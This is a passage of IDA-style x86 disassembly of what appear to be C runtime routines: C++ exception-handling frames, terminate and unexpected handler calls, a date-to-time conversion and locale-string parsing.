loc_42D29C: ; CODE XREF: sub_42D250+3D�j
mov eax, [ebp+arg_1C]
mov ecx, [eax]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_42D120
add esp, 10h
mov edx, [ebp+arg_1C]
mov eax, [edx+4]
add eax, 1
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
push 100h
mov edx, [ebp+arg_20]
push edx
mov eax, [ebp+arg_14]
mov ecx, [eax+0Ch]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42D310
add esp, 1Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_42D303
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_420350
loc_42D303: ; CODE XREF: sub_42D250+A4�j
mov esp, ebp
pop ebp
retn
sub_42D250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D310 proc near ; CODE XREF: sub_42D250+95�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
; FUNCTION CHUNK AT 0042D44B SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D338
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
mov [ebp+var_24], 0
mov ecx, [ebp+arg_4]
mov edx, [ecx-4]
mov [ebp+var_28], edx
call sub_428EE0
mov eax, [eax+6Ch]
mov [ebp+var_1C], eax
call sub_428EE0
mov ecx, [eax+70h]
mov [ebp+var_20], ecx
call sub_428EE0
mov edx, [ebp+arg_0]
mov [eax+6Ch], edx
call sub_428EE0
mov ecx, [ebp+arg_8]
mov [eax+70h], ecx
mov [ebp+var_4], 0
mov [ebp+var_4], 1
mov edx, [ebp+arg_18]
push edx
mov eax, [ebp+arg_14]
push eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_420490
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], 0
jmp short loc_42D3DF
; ---------------------------------------------------------------------------
loc_42D3AE: ; DATA XREF: _1:0043D348�o
mov ecx, [ebp+var_14]
push ecx
call sub_42D460
add esp, 4
retn
; ---------------------------------------------------------------------------
loc_42D3BB: ; DATA XREF: _1:0043D34C�o
mov esp, [ebp+var_18]
mov [ebp+var_2C], 0
push 0FFFFFFFFh
mov [ebp+var_30], 0
lea edx, [ebp+var_10]
push edx
call sub_420772
add esp, 8
mov eax, [ebp+var_30]
jmp short loc_42D44E
; ---------------------------------------------------------------------------
loc_42D3DF: ; CODE XREF: sub_42D310+9C�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_42D3ED
jmp short loc_42D44B
sub_42D310 endp
; =============== S U B R O U T I N E =======================================
sub_42D3ED proc near ; CODE XREF: sub_42D310+D6�p
; DATA XREF: _1:0043D340�o
mov eax, [ebp+0Ch]
mov ecx, [ebp-28h]
mov [eax-4], ecx
call sub_428EE0
mov edx, [ebp-1Ch]
mov [eax+6Ch], edx
call sub_428EE0
mov ecx, [ebp-20h]
mov [eax+70h], ecx
mov edx, [ebp+8]
cmp dword ptr [edx], 0E06D7363h
jnz short locret_42D44A
mov eax, [ebp+8]
cmp dword ptr [eax+10h], 3
jnz short locret_42D44A
mov ecx, [ebp+8]
cmp dword ptr [ecx+14h], 19930520h
jnz short locret_42D44A
cmp dword ptr [ebp-24h], 0
jnz short locret_42D44A
cmp dword ptr [ebp-2Ch], 0
jz short locret_42D44A
call sub_4207DA
push eax
mov edx, [ebp+8]
push edx
call sub_42D730
add esp, 8
locret_42D44A: ; CODE XREF: sub_42D3ED+28�j
; sub_42D3ED+31�j ...
retn
sub_42D3ED endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D310
loc_42D44B: ; CODE XREF: sub_42D310+DB�j
mov eax, [ebp+var_2C]
loc_42D44E: ; CODE XREF: sub_42D310+CD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42D310
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D460 proc near ; CODE XREF: sub_42D310+A2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
cmp dword ptr [edx], 0E06D7363h
jnz short loc_42D49C
mov eax, [ebp+var_4]
cmp dword ptr [eax+10h], 3
jnz short loc_42D49C
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 19930520h
jnz short loc_42D49C
mov edx, [ebp+var_4]
cmp dword ptr [edx+1Ch], 0
jnz short loc_42D49C
mov eax, 1
jmp short loc_42D49E
; ---------------------------------------------------------------------------
loc_42D49C: ; CODE XREF: sub_42D460+15�j
; sub_42D460+1E�j ...
xor eax, eax
loc_42D49E: ; CODE XREF: sub_42D460+3A�j
mov esp, ebp
pop ebp
retn
sub_42D460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D4B0 proc near ; CODE XREF: sub_42D250+22�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D350
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 0
jz short loc_42D4F6
mov ecx, [ebp+arg_8]
mov edx, [ecx+4]
movsx eax, byte ptr [edx+8]
test eax, eax
jz short loc_42D4F6
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+8], 0
jnz short loc_42D4FB
loc_42D4F6: ; CODE XREF: sub_42D4B0+2D�j
; sub_42D4B0+3B�j
jmp loc_42D71A
; ---------------------------------------------------------------------------
loc_42D4FB: ; CODE XREF: sub_42D4B0+44�j
mov edx, [ebp+arg_8]
mov eax, [edx+8]
mov ecx, [ebp+arg_4]
lea edx, [ecx+eax+0Ch]
mov [ebp+var_1C], edx
mov [ebp+var_4], 0
mov eax, [ebp+arg_8]
mov ecx, [eax]
and ecx, 8
test ecx, ecx
jz short loc_42D576
push 1
mov edx, [ebp+arg_0]
mov eax, [edx+18h]
push eax
call sub_432F80
add esp, 8
test eax, eax
jz short loc_42D56C
push 1
mov ecx, [ebp+var_1C]
push ecx
call sub_432FB0
add esp, 8
test eax, eax
jz short loc_42D56C
mov edx, [ebp+var_1C]
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
mov [edx], ecx
mov edx, [ebp+arg_C]
add edx, 8
push edx
mov eax, [ebp+var_1C]
mov ecx, [eax]
push ecx
call sub_42D7C0
add esp, 8
mov edx, [ebp+var_1C]
mov [edx], eax
jmp short loc_42D571
; ---------------------------------------------------------------------------
loc_42D56C: ; CODE XREF: sub_42D4B0+81�j
; sub_42D4B0+93�j
call sub_42D910
loc_42D571: ; CODE XREF: sub_42D4B0+BA�j
jmp loc_42D703
; ---------------------------------------------------------------------------
loc_42D576: ; CODE XREF: sub_42D4B0+6C�j
mov eax, [ebp+arg_C]
mov ecx, [eax]
and ecx, 1
test ecx, ecx
jz short loc_42D5FA
push 1
mov edx, [ebp+arg_0]
mov eax, [edx+18h]
push eax
call sub_432F80
add esp, 8
test eax, eax
jz short loc_42D5F0
push 1
mov ecx, [ebp+var_1C]
push ecx
call sub_432FB0
add esp, 8
test eax, eax
jz short loc_42D5F0
mov edx, [ebp+arg_C]
mov eax, [edx+14h]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+var_1C]
push eax
call sub_420840
add esp, 0Ch
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+14h], 4
jnz short loc_42D5EE
mov edx, [ebp+var_1C]
cmp dword ptr [edx], 0
jz short loc_42D5EE
mov eax, [ebp+arg_C]
add eax, 8
push eax
mov ecx, [ebp+var_1C]
mov edx, [ecx]
push edx
call sub_42D7C0
add esp, 8
mov ecx, [ebp+var_1C]
mov [ecx], eax
loc_42D5EE: ; CODE XREF: sub_42D4B0+11A�j
; sub_42D4B0+122�j
jmp short loc_42D5F5
; ---------------------------------------------------------------------------
loc_42D5F0: ; CODE XREF: sub_42D4B0+E5�j
; sub_42D4B0+F7�j
call sub_42D910
loc_42D5F5: ; CODE XREF: sub_42D4B0:loc_42D5EE�j
jmp loc_42D703
; ---------------------------------------------------------------------------
loc_42D5FA: ; CODE XREF: sub_42D4B0+D0�j
mov edx, [ebp+arg_C]
cmp dword ptr [edx+18h], 0
jnz short loc_42D660
push 1
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
push ecx
call sub_432F80
add esp, 8
test eax, eax
jz short loc_42D656
push 1
mov edx, [ebp+var_1C]
push edx
call sub_432FB0
add esp, 8
test eax, eax
jz short loc_42D656
mov eax, [ebp+arg_C]
mov ecx, [eax+14h]
push ecx
mov edx, [ebp+arg_C]
add edx, 8
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
push ecx
call sub_42D7C0
add esp, 8
push eax
mov edx, [ebp+var_1C]
push edx
call sub_420840
add esp, 0Ch
jmp short loc_42D65B
; ---------------------------------------------------------------------------
loc_42D656: ; CODE XREF: sub_42D4B0+166�j
; sub_42D4B0+178�j
call sub_42D910
loc_42D65B: ; CODE XREF: sub_42D4B0+1A4�j
jmp loc_42D703
; ---------------------------------------------------------------------------
loc_42D660: ; CODE XREF: sub_42D4B0+151�j
push 1
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
push ecx
call sub_432F80
add esp, 8
test eax, eax
jz loc_42D6FE
push 1
mov edx, [ebp+var_1C]
push edx
call sub_432FB0
add esp, 8
test eax, eax
jz short loc_42D6FE
mov eax, [ebp+arg_C]
mov ecx, [eax+18h]
push ecx
call sub_432FE0
add esp, 4
test eax, eax
jz short loc_42D6FE
mov edx, [ebp+arg_C]
mov eax, [edx]
and eax, 4
test eax, eax
jz short loc_42D6D5
push 1
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+18h]
push eax
call sub_42D7C0
add esp, 8
push eax
mov ecx, [ebp+arg_C]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+var_1C]
push eax
call sub_4203B0
jmp short loc_42D6FC
; ---------------------------------------------------------------------------
loc_42D6D5: ; CODE XREF: sub_42D4B0+1F8�j
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+18h]
push eax
call sub_42D7C0
add esp, 8
push eax
mov ecx, [ebp+arg_C]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+var_1C]
push eax
call sub_4203A0
loc_42D6FC: ; CODE XREF: sub_42D4B0+223�j
jmp short loc_42D703
; ---------------------------------------------------------------------------
loc_42D6FE: ; CODE XREF: sub_42D4B0+1C3�j
; sub_42D4B0+1D9�j ...
call sub_42D910
loc_42D703: ; CODE XREF: sub_42D4B0:loc_42D571�j
; sub_42D4B0:loc_42D5F5�j ...
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42D71A
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
call sub_42D860
loc_42D71A: ; CODE XREF: sub_42D4B0:loc_42D4F6�j
; sub_42D4B0+25A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42D4B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D730 proc near ; CODE XREF: sub_42CCA0+252�p
; sub_42D3ED+55�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D360
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp [ebp+arg_0], 0
jz short loc_42D7A5
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp dword ptr [ecx+4], 0
jz short loc_42D7A5
mov [ebp+var_4], 0
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+4]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+18h]
push eax
call sub_420390
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42D7A5
; ---------------------------------------------------------------------------
mov eax, [ebp+arg_4]
and eax, 0FFh
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
call sub_42D860
loc_42D7A5: ; CODE XREF: sub_42D730+2A�j
; sub_42D730+36�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42D730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D7C0 proc near ; CODE XREF: sub_42D4B0+AD�p
; sub_42D4B0+131�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
cmp dword ptr [edx+4], 0
jl short loc_42D7FF
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
mov edx, [ebp+arg_0]
mov eax, [edx+ecx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
mov ecx, [ebp+var_4]
add ecx, [eax+edx]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, [edx+4]
mov [ebp+var_4], eax
loc_42D7FF: ; CODE XREF: sub_42D7C0+16�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42D7C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D810 proc near ; CODE XREF: sub_420490+4D�p
; sub_42D120+8B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_4207FD
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_42D84F
mov ecx, 2
loc_42D84F: ; CODE XREF: sub_42D810+38�j
push ecx
call sub_4207FD
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_42D810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D860 proc near ; CODE XREF: sub_42CCA0:loc_42CF33�p
; sub_42D220:loc_42D241�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042D8D4 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D370
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
call sub_428EE0
cmp dword ptr [eax+60h], 0
jz short loc_42D8C0
mov [ebp+var_4], 1
call sub_428EE0
call dword ptr [eax+60h]
mov [ebp+var_4], 0
jmp short loc_42D8C0
; ---------------------------------------------------------------------------
loc_42D8B0: ; DATA XREF: _1:0043D380�o
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_42D8B6: ; DATA XREF: _1:0043D384�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_42D8C0: ; CODE XREF: sub_42D860+36�j
; sub_42D860+4E�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_42D8CE
jmp short loc_42D8D4
sub_42D860 endp
; =============== S U B R O U T I N E =======================================
sub_42D8CE proc near ; CODE XREF: sub_42D860+67�p
; DATA XREF: _1:0043D378�o
call sub_433010
retn
sub_42D8CE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D860
loc_42D8D4: ; CODE XREF: sub_42D860+6C�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42D860
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call sub_428EE0
cmp dword ptr [eax+64h], 0
jz short loc_42D906
call sub_428EE0
call dword ptr [eax+64h]
loc_42D906: ; CODE XREF: _0:0042D8FC�j
call sub_42D860
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D910 proc near ; CODE XREF: sub_4206A0+23�p
; sub_4206A0:loc_42070D�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042D980 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D388
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
cmp ds:off_4541B0, 0
jz short loc_42D96C
mov [ebp+var_4], 1
call ds:off_4541B0
mov [ebp+var_4], 0
jmp short loc_42D96C
; ---------------------------------------------------------------------------
loc_42D95C: ; DATA XREF: _1:0043D398�o
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_42D962: ; DATA XREF: _1:0043D39C�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_42D96C: ; CODE XREF: sub_42D910+34�j
; sub_42D910+4A�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_42D97A
jmp short loc_42D980
sub_42D910 endp
; =============== S U B R O U T I N E =======================================
sub_42D97A proc near ; CODE XREF: sub_42D910+63�p
; DATA XREF: _1:0043D390�o
call sub_42D860
retn
sub_42D97A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D910
loc_42D980: ; CODE XREF: sub_42D910+68�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42D910
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D9A0 proc near ; CODE XREF: sub_420D80+161�p
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
sub eax, 76Ch
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 46h
jl short loc_42D9C0
cmp [ebp+arg_0], 8Ah
jle short loc_42D9C8
loc_42D9C0: ; CODE XREF: sub_42D9A0+15�j
or eax, 0FFFFFFFFh
jmp loc_42DA8A
; ---------------------------------------------------------------------------
loc_42D9C8: ; CODE XREF: sub_42D9A0+1E�j
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_8]
add edx, ds:dword_45456C[ecx*4]
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
and eax, 3
test eax, eax
jnz short loc_42D9F1
cmp [ebp+arg_4], 2
jle short loc_42D9F1
mov ecx, [ebp+var_2C]
add ecx, 1
mov [ebp+var_2C], ecx
loc_42D9F1: ; CODE XREF: sub_42D9A0+40�j
; sub_42D9A0+46�j
mov edx, [ebp+arg_0]
sub edx, 46h
imul edx, 16Dh
mov eax, [ebp+arg_0]
sub eax, 1
sar eax, 2
mov ecx, [ebp+var_2C]
add ecx, edx
lea edx, [eax+ecx-11h]
imul edx, 18h
add edx, [ebp+arg_C]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
imul eax, 3Ch
add eax, [ebp+arg_10]
imul eax, 3Ch
add eax, [ebp+arg_14]
mov [ebp+var_4], eax
call sub_433030
mov ecx, [ebp+var_4]
add ecx, ds:dword_454488
mov [ebp+var_4], ecx
mov edx, [ebp+var_2C]
mov [ebp+var_C], edx
mov eax, [ebp+arg_0]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_4]
sub ecx, 1
mov [ebp+var_18], ecx
mov edx, [ebp+arg_C]
mov [ebp+var_20], edx
cmp [ebp+arg_18], 1
jz short loc_42DA7B
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_42DA87
cmp ds:dword_45448C, 0
jz short loc_42DA87
lea eax, [ebp+var_28]
push eax
call sub_433440
add esp, 4
test eax, eax
jz short loc_42DA87
loc_42DA7B: ; CODE XREF: sub_42D9A0+BA�j
mov ecx, [ebp+var_4]
add ecx, ds:dword_454490
mov [ebp+var_4], ecx
loc_42DA87: ; CODE XREF: sub_42D9A0+C0�j
; sub_42D9A0+C9�j ...
mov eax, [ebp+var_4]
loc_42DA8A: ; CODE XREF: sub_42D9A0+23�j
mov esp, ebp
pop ebp
retn
sub_42D9A0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 0B0h
cmp dword ptr [ebp+8], 0
jl short loc_42DAA5
cmp dword ptr [ebp+8], 5
jle short loc_42DAAC
loc_42DAA5: ; CODE XREF: _0:0042DA9D�j
xor eax, eax
jmp loc_42DE7B
; ---------------------------------------------------------------------------
loc_42DAAC: ; CODE XREF: _0:0042DAA3�j
push 13h
call sub_423280
add esp, 4
mov dword ptr [ebp-4], 1
mov eax, ds:dword_4F37C4
add eax, 1
mov ds:dword_4F37C4, eax
loc_42DACA: ; CODE XREF: _0:0042DADB�j
cmp ds:dword_4F37C8, 0
jz short loc_42DADD
push 1
call ds:dword_4F534C ; Sleep
jmp short loc_42DACA
; ---------------------------------------------------------------------------
loc_42DADD: ; CODE XREF: _0:0042DAD1�j
cmp dword ptr [ebp+8], 0
jz short loc_42DB21
cmp dword ptr [ebp+0Ch], 0
jz short loc_42DB01
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
call sub_42DE80
add esp, 8
mov [ebp-0A8h], eax
jmp short loc_42DB13
; ---------------------------------------------------------------------------
loc_42DB01: ; CODE XREF: _0:0042DAE7�j
mov eax, [ebp+8]
imul eax, 0Ch
mov ecx, ds:dword_4542C4[eax]
mov [ebp-0A8h], ecx
loc_42DB13: ; CODE XREF: _0:0042DAFF�j
mov edx, [ebp-0A8h]
mov [ebp-8], edx
jmp loc_42DE5B
; ---------------------------------------------------------------------------
loc_42DB21: ; CODE XREF: _0:0042DAE1�j
mov dword ptr [ebp-14h], 1
mov dword ptr [ebp-0Ch], 0
cmp dword ptr [ebp+0Ch], 0
jz loc_42DE53
mov eax, [ebp+0Ch]
movsx ecx, byte ptr [eax]
cmp ecx, 4Ch
jnz loc_42DD64
mov edx, [ebp+0Ch]
movsx eax, byte ptr [edx+1]
cmp eax, 43h
jnz loc_42DD64
mov ecx, [ebp+0Ch]
movsx edx, byte ptr [ecx+2]
cmp edx, 5Fh
jnz loc_42DD64
mov eax, [ebp+0Ch]
mov [ebp-9Ch], eax
loc_42DB71: ; CODE XREF: _0:0042DD33�j
push offset asc_43D3E4 ; "=;"
mov ecx, [ebp-9Ch]
push ecx
call sub_434E70
add esp, 8
mov [ebp-0A0h], eax
cmp dword ptr [ebp-0A0h], 0
jz short loc_42DBBD
mov edx, [ebp-0A0h]
sub edx, [ebp-9Ch]
mov [ebp-0A4h], edx
cmp dword ptr [ebp-0A4h], 0
jz short loc_42DBBD
mov eax, [ebp-0A0h]
movsx ecx, byte ptr [eax]
cmp ecx, 3Bh
jnz short loc_42DBE3
loc_42DBBD: ; CODE XREF: _0:0042DB92�j _0:0042DBAD�j
cmp dword ptr [ebp-4], 0
jz short loc_42DBDC
push 13h
call sub_423320
add esp, 4
mov edx, ds:dword_4F37C4
sub edx, 1
mov ds:dword_4F37C4, edx
loc_42DBDC: ; CODE XREF: _0:0042DBC1�j
xor eax, eax
jmp loc_42DE7B
; ---------------------------------------------------------------------------
loc_42DBE3: ; CODE XREF: _0:0042DBBB�j
mov dword ptr [ebp-10h], 1
jmp short loc_42DBF5
; ---------------------------------------------------------------------------
loc_42DBEC: ; CODE XREF: _0:loc_42DC41�j
mov eax, [ebp-10h]
add eax, 1
mov [ebp-10h], eax
loc_42DBF5: ; CODE XREF: _0:0042DBEA�j
cmp dword ptr [ebp-10h], 5
jg short loc_42DC43
mov ecx, [ebp-0A4h]
push ecx
mov edx, [ebp-9Ch]
push edx
mov eax, [ebp-10h]
imul eax, 0Ch
mov ecx, ds:off_4542C0[eax]
push ecx
call sub_41F5E0
add esp, 0Ch
test eax, eax
jnz short loc_42DC41
mov edx, [ebp-10h]
imul edx, 0Ch
mov eax, ds:off_4542C0[edx]
push eax
call sub_41BC70
add esp, 4
cmp [ebp-0A4h], eax
jnz short loc_42DC41
jmp short loc_42DC43
; ---------------------------------------------------------------------------
loc_42DC41: ; CODE XREF: _0:0042DC20�j _0:0042DC3D�j
jmp short loc_42DBEC
; ---------------------------------------------------------------------------
loc_42DC43: ; CODE XREF: _0:0042DBF9�j _0:0042DC3F�j
push offset asc_43D3E0 ; ";"
mov ecx, [ebp-0A0h]
add ecx, 1
mov [ebp-0A0h], ecx
mov edx, [ebp-0A0h]
push edx
call sub_434E30
add esp, 8
mov [ebp-0A4h], eax
cmp dword ptr [ebp-0A4h], 0
jnz short loc_42DCA9
mov eax, [ebp-0A0h]
movsx ecx, byte ptr [eax]
cmp ecx, 3Bh
jz short loc_42DCA9
cmp dword ptr [ebp-4], 0
jz short loc_42DCA2
push 13h
call sub_423320
add esp, 4
mov edx, ds:dword_4F37C4
sub edx, 1
mov ds:dword_4F37C4, edx
loc_42DCA2: ; CODE XREF: _0:0042DC87�j
xor eax, eax
jmp loc_42DE7B
; ---------------------------------------------------------------------------
loc_42DCA9: ; CODE XREF: _0:0042DC73�j _0:0042DC81�j
cmp dword ptr [ebp-10h], 5
jg short loc_42DCFA
mov eax, [ebp-0A4h]
push eax
mov ecx, [ebp-0A0h]
push ecx
lea edx, [ebp-98h]
push edx
call sub_41E510
add esp, 0Ch
mov eax, [ebp-0A4h]
mov byte ptr [ebp+eax-98h], 0
lea ecx, [ebp-98h]
push ecx
mov edx, [ebp-10h]
push edx
call sub_42DE80
add esp, 8
test eax, eax
jz short loc_42DCFA
mov eax, [ebp-0Ch]
add eax, 1
mov [ebp-0Ch], eax
loc_42DCFA: ; CODE XREF: _0:0042DCAD�j _0:0042DCEF�j
mov ecx, [ebp-0A0h]
add ecx, [ebp-0A4h]
mov [ebp-9Ch], ecx
mov edx, [ebp-9Ch]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_42DD28
mov ecx, [ebp-9Ch]
add ecx, 1
mov [ebp-9Ch], ecx
loc_42DD28: ; CODE XREF: _0:0042DD17�j
mov edx, [ebp-9Ch]
movsx eax, byte ptr [edx]
test eax, eax
jnz loc_42DB71
cmp dword ptr [ebp-0Ch], 0
jz short loc_42DD4C
call sub_42E020
mov [ebp-0ACh], eax
jmp short loc_42DD56
; ---------------------------------------------------------------------------
loc_42DD4C: ; CODE XREF: _0:0042DD3D�j
mov dword ptr [ebp-0ACh], 0
loc_42DD56: ; CODE XREF: _0:0042DD4A�j
mov ecx, [ebp-0ACh]
mov [ebp-8], ecx
jmp loc_42DE51
; ---------------------------------------------------------------------------
loc_42DD64: ; CODE XREF: _0:0042DB42�j _0:0042DB52�j ...
mov edx, [ebp+8]
push edx
push 0
push 0
lea eax, [ebp-98h]
push eax
mov ecx, [ebp+0Ch]
push ecx
call sub_42E120
add esp, 14h
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_42DE51
mov dword ptr [ebp-10h], 0
jmp short loc_42DD9E
; ---------------------------------------------------------------------------
loc_42DD95: ; CODE XREF: _0:loc_42DDFE�j
mov edx, [ebp-10h]
add edx, 1
mov [ebp-10h], edx
